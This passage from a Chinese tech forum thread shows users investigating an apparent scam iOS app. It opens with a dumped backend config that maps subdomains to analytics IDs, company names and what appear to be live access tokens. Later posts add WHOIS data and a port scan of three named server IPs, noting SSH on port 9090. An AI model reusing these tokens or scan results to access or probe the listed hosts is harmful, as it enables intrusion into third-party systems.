companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yice.youqiliang.net": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281202909&web_id=1281202909",
remark: "百度优起量",
companyName: "湖北优起量信息技术有限公司宜昌分公司",
token: "NTCtLlqTAzu4xM5mirkbygs7UvWx19Mk@wDWYPerVk84HPcDfcbiOPpZxSHENOYIa"
},
"yc.kangjunwangluo.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281201007&web_id=1281201007",
remark: "百度盐城康俊 1",
companyName: "盐城康俊网络科技有限公司",
token: "5W2X3KFuWYkVE8pibqMSpUwjrFA8kgGv@fx4ohnyAZ9OmQV0dPy5QBLePHisMnHyZ"
},
"yc1.kangjunwangluo.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281200881&web_id=1281200881",
remark: "百度盐城康俊 2",
companyName: "盐城康俊网络科技有限公司",
token: "dbIVk0YpFjCoZomjqIXgoDtkj3CP7c6r@dYrUVa0Add4HZKFdVpoICCupTmKT4ZSv"
},
"yc2.kangjunwangluo.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281201255&web_id=1281201255",
remark: "百度盐城康俊 3",
companyName: "盐城康俊网络科技有限公司",
token: "SgFmpkphMarKCMxG4zsIMOqeKPSKhXZd@FKRRrK5ubsaGPLibRH19ac3sx6lK3Bv2"
},
"yc3.kangjunwangluo.cn": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201256&web_id=1281201256",
remark: "百度盐城康俊 4",
companyName: "盐城康俊网络科技有限公司",
token: "WxFsfo3VjMwweV0DRjiOskObKjr572kh@M6xZPITnypP8bpd5PldGiPc1OUAM2ZlX"
},
"yc4.kangjunwangluo.cn": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201257&web_id=1281201257",
remark: "百度盐城康俊 5",
companyName: "盐城康俊网络科技有限公司",
token: "3eLDxW17zGCE5et35spTXBxdjFclg9pC@MxaTXo9vmCOoZPFsyMfSPlv98stsq9kF"
},
"yc1.gelanrui.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203734&web_id=1281203734",
remark: "百度葛 1",
companyName: "盐城葛兰锐网络科技有限公司",
token: "lIGeM4pQK0r56hkPRGGQSbx1wHhkReUL@CCGjYrDecy9RVlGDIkkhOm1RmH2WDGfG"
},
"yc2.gelanrui.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281203735&web_id=1281203735",
remark: "百度葛 2",
companyName: "盐城葛兰锐网络科技有限公司",
token: "lIGeM4pQK0r56hkPRGGQSbx1wHhkReUL@CCGjYrDecy9RVlGDIkkhOm1RmH2WDGfG"
},
"yc3.gelanrui.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203736&web_id=1281203736",
remark: "百度葛 3",
companyName: "盐城葛兰锐网络科技有限公司",
token: "kjcGPAqbjpgHCUEvYC7qEp2jYyaVdytP@QGfbE2EjPunaI9W0ZBHDiCLfQuOuHCmc"
},
"yc4.gelanrui.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281203737&web_id=1281203737",
remark: "百度葛 4",
companyName: "盐城葛兰锐网络科技有限公司",
token: "Cisj1njTcs6LkfIZuIYaak3dHbj8m6Xm@SIcZhUD4wHgtxD1VOHfDbM84ltG5kguV"
},
"yc5.gelanrui.cn": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203738&web_id=1281203738",
remark: "百度葛 5",
companyName: "盐城葛兰锐网络科技有限公司",
token: "7WwaMwSvXTusziQRWdRRRXAo0qkshiwt@aFQVrgytegfIACj0nehWzTCYoYlzY4AW"
},
"ftp.kangjunwangluo.cn": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281206148&web_id=1281206148",
remark: "1",
companyName: "盐城康俊网络科技有限公司",
token: "mX3WA5uG7dzvUZ6SUZVejdngP480YUQz@ziUVKzGuGME19SkFCqSNm3iBKqwHcPGx"
},
"yc-op1.pangfeng.ink": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281223718&web_id=1281223718",
remark: "1",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc.ycqiyu.com": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281213267&web_id=1281213267",
remark: "快手",
companyName: "盐城琪煜科技有限公司",
token: ""
},
"yc1.ycqiyu.com": {
cnzz: "https://s4.cnzz.com/z_stat.php?id=1281214652&web_id=1281214652",
remark: "快手",
companyName: "盐城琪煜科技有限公司",
token: ""
}
};
dsb2468
    291
dsb2468  
   2023-07-25 11:55:11 +08:00
@alihbaba vip.yime888.com 半小时前,我打开了
PaddyPang
    292
PaddyPang  
   2023-07-25 12:06:59 +08:00
Domain Name: YIME888.COM
Registry Domain ID: 2687945681_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.paycenter.com.cn
Registrar URL: http://www.xinnet.com
Updated Date: 2023-01-03T07:03:11Z
Creation Date: 2022-04-09T09:00:48Z
Registry Expiry Date: 2024-04-09T09:00:48Z
Registrar: Xin Net Technology Corporation
Registrar IANA ID: 120
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +86.4008182233
Domain Status: ok https://icann.org/epp#ok
Name Server: NS11.XINCACHE.COM
Name Server: NS12.XINCACHE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/



有了 whois 信息能向新网申请查这个域名归属吗?
ViceV
    293
ViceV  
   2023-07-25 12:26:50 +08:00   ❤️ 2
预言一下,这帖子必被果子公关,老子发酷安点评吐槽果子机缺点的帖子半年后偷偷摸摸给我删了,是真的恶心。
godwinma
    294
godwinma  
   2023-07-25 12:49:26 +08:00
app 已经不提供了。
alihbaba
    295
alihbaba  
   2023-07-25 13:01:31 +08:00
@dsb2468 有可能 他们有很多类型的 APP 我昨天见 向那种交友的我见后台就是一个记录下载量的界面 App 里有可能有别的收集的
alihbaba
    296
alihbaba  
   2023-07-25 13:02:10 +08:00
@dsb2468 现在貌似不行了 我上线就没打开一个
jyeric
    297
jyeric  
   2023-07-25 13:25:56 +08:00   ❤️ 4
好像有比较大的媒体转发了
https://www.bilibili.com/opus/822155614924832808
nVic
    298
nVic  
   2023-07-25 13:31:16 +08:00
现在骗子多的很,你丈母娘有没有骗你这都不好说哦。

appstore 拒绝退款无非是此 ID 退款太多呗,或者涉及到的数额太大,不属于合理范围内,需要进行诉讼才能完成。
DevHjz
    299
DevHjz  
   2023-07-25 13:49:52 +08:00
@alihbaba 239-240 楼里我扫了子域名,那几个 IP 开放的端口不止 80 ,还有其它端口,跑着各种服务。
27.0.192.153 Ports 80 443 888 8888 9090
45.116.215.33 Ports 80 443 9090
103.229.183.139 Ports 80 443 888 9090
OpenSSH 全部都在 9090 端口。
Dashit
    300
Dashit  
   2023-07-25 13:51:31 +08:00
这种 App 是不是还花钱去推广了,不然哪里来的这么多下载量。
1  2  3  4  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5532 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 47ms · UTC 09:02 · PVG 17:02 · LAX 01:02 · JFK 04:02
Developed with CodeLauncher
♥ Do have faith in what you're doing.